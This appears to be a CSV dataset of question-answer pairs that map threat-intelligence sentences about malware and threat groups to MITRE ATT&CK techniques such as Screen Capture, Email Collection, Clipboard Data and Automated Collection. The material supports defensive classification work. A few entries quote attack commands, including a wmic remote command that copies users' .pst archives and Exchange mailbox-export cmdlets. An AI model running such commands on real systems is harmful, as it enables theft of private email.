+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TURNEDUP is capable of taking screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to take screenshots on an infected host including capturing content from windows of instant messaging applications.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot contains screen capture functionality.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can take a desktop screenshot and save the file into \ProgramData\Mail\MailAg\shot.png.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian has the ability to take screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT can capture desktop screenshots in the PNG format and send them to the C2 server.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used hooked APIs to take screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN can perform screen captures of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability to take screenshots on a compromised host.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT has the ability to take a screenshot of the infected host desktop using Windows GDI+.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XAgentOSX contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.","Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET saves a screen capture of the victim's system with a numbered filename and .jpg extension. Screen captures are taken at specified intervals based on the system.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has the ability to obtain screenshots of the compromised system.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A variant of Zebrocy captures screenshots of the victim’s machine in JPEG and BMP format.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda can take screenshots of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can capture screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT can capture the victim’s screen remotely.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT has the capability to take screenshots of the victim’s machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can take and save screenshots.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can capture screenshots of the victim’s machines.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty collects screenshots of the victim machine.,"Tecnique: T1113 Screen Capture, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has compromised email credentials in order to steal sensitive data.,"Tecnique: T1114 Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has exfiltrated entire mailboxes from compromised accounts.,"Tecnique: T1114 Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed leveraging a module that can scrape email addresses from Outlook.,"Tecnique: T1114 Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used RAT malware to exfiltrate email archives.","Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.","Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has harvested data from victim's e-mail including through execution of wmic /node: process call create ""cmd /c copy c:\Users\\\backup.pst c:\windows\temp\backup.pst"" copy ""i:\\\My Documents\.pst""
+copy .","Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has collected .PST archives.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a command to collect and exfiltrate emails from Outlook.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed leveraging a module that scrapes email data from Outlook.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire has the ability to collect emails on a target system.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can harvest data from mail clients.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Out1 can parse e-mails on a target machine.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can interact with a victim’s Outlook session and look through folders and emails.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.,"Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).","Tecnique: T1114.001 Email Collection: Local Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 collected emails from specific individuals, such as executives and IT staff, using `New-MailboxExportRequest` followed by `Get-MailboxExportRequest`.","Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 uses two utilities, GETMAIL and MAPIGET, to steal email. MAPIGET steals email still on Exchange servers that has not yet been archived.","Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has collected emails from victim Microsoft Exchange servers.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has collected emails from targeted mailboxes within a compromised Azure AD tenant and compromised Exchange servers, including via Exchange Web Services (EWS) API requests.","Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has harvested data from remote mailboxes including through execution of \\\c$\Users\\AppData\Local\Microsoft\Outlook*.ost .,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has accessed email accounts using Outlook Web Access.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has accessed and hijacked online email communications using stolen credentials.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used web shells to export mailbox data.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer used a tool called MailSniper to search through the Exchange server mailboxes for keywords.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has exported emails from compromised Exchange servers including through use of the cmdlet `New-MailboxExportRequest.`,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron collects Exchange emails matching rules specified in its configuration.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MailSniper can be used for searching through email in Exchange and Office 365 environments.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.,"Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.","Tecnique: T1114.002 Email Collection: Remote Email Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has set auto-forward rules on victim's e-mail accounts.,"Tecnique: T1114.003 Email Collection: Email Forwarding Rule, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.,"Tecnique: T1114.003 Email Collection: Email Forwarding Rule, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has set up auto forwarding rules on compromised e-mail accounts.,"Tecnique: T1114.003 Email Collection: Email Forwarding Rule, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors collected clipboard data in plaintext.","Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 used a Trojan called KEYLIME to collect data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used tools capable of stealing contents of the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can steal data from the victim’s clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to steal data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas steals data stored in the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling has the ability to capture and store clipboard data.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke copies and exfiltrates the clipboard contents every 30 seconds.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can steal data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate starts a thread on execution that captures clipboard data and logs it to a predefined log file.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can download a clipboard information stealer module.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can harvest clipboard data on both Windows and macOS systems.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has a function to use the OpenClipboard wrapper.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can collect clipboard data.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can capture clipboard data from a compromised host.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The executable version of Helminth has a module to log clipboard contents.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A JHUHUGIT variant accesses a screenshot saved in the clipboard and converts it to a JPG image.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI had a feature to steal data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can retrieve the current content of the user clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy can steal clipboard contents.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete hijacks the clipboard data by creating an overlapped window that listens to keyboard events.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can capture clipboard content.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz can monitor content saved to the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu has the ability to capture and replace Bitcoin wallet data in the clipboard on a compromised host.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can extract clipboard data from a compromised host.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM collects data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos steals and modifies data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi collects text from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT contains code to open and copy data from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to steal data from the clipboard of an infected host.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot contains functionality to collect information from the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN collects data stored in the clipboard.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda can hook GetClipboardData function to watch for clipboard pastes to collect.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can capture clipboard data.,"Tecnique: T1115 Clipboard Data, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used a script to collect information about the infected system.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used custom DLLs for continuous retrieval of data from memory.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used a file stealer to steal documents and images with the following extensions: txt, pdf, png, jpg, doc, xls, xlm, odp, ods, odt, rtf, ppt, xlsx, xlsm, docx, pptx, and jpeg.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has deployed scripts on compromised systems that automatically scan for interesting documents.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has performed frequent and scheduled data collection from victim networks.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda used custom batch scripts to collect files automatically from a targeted system.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used automated collection.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork developed a file stealer to search C:\ and collect files with certain extensions. Patchwork also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used tools to automatically collect system and network configuration information.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 ran a command to compile an archive of file types of interest from the victim user's directories.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has collected information automatically using the adversary's USBferry attack.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used the Csvde tool to collect Active Directory files and data.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has automatically collected data about the compromised system.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS monitors USB devices and copies files with certain extensions to a predefined directory.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot recursively generates a list of files within a directory and sends them back to the control server.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can automatically monitor removable drives in a loop and copy interesting files.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate searches for stored credentials associated with cryptocurrency wallets and notifies the command and control server when identified.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can automatically gather the username, domain name, machine name, and other information from a compromised system.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can monitor files for changes and automatically collect them.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Helminth VBScript receives a batch script to execute a set of commands in a command prompt.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron can be configured to automatically collect files under a specified directory.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoFiSe can collect all the files from the working directory every three hours and place them into a password-protected archive for further exfiltration.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MESSAGETAP checks two files, keyword_parm.txt and parm.txt, for instructions on how to target and save data parsed and extracted from SMS message data from the network traffic. If an SMS message contained either a phone number, IMSI number, or keyword that matched the predefined list, it is saved to a CSV file for later theft by the threat actor.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt).","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mythic supports scripting of file downloads from agents.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can automatically archive collected data.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel can automatically scan for and collect files with specific extensions.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PACEMAKER can enter a loop to read `/proc/` entries every 2 seconds in order to read a target application's memory.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can automatically collect data, such as CloudFormation templates, EC2 user data, AWS Inspector reports, and IAM credential reports.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT used file system monitoring to track modification and enable automatic exfiltration.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc automatically collects data about the victim and sends it to the control server.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROADTools automatically gathers data from Azure AD environments using the Azure Graph API.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them. It can continue tagging documents to collect with follow up scans.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Depending on the Linux distribution, RotaJakiro executes a set of commands to collect device information and sends the collected information to the C2 server.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: T9000 searches removable storage devices for files with a pre-defined list of file extensions (e.g. * .doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to index and compress files into a send queue for exfiltration.,"Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration.","Tecnique: T1119 Automated Collection, Tactic: TA0009 Collection"
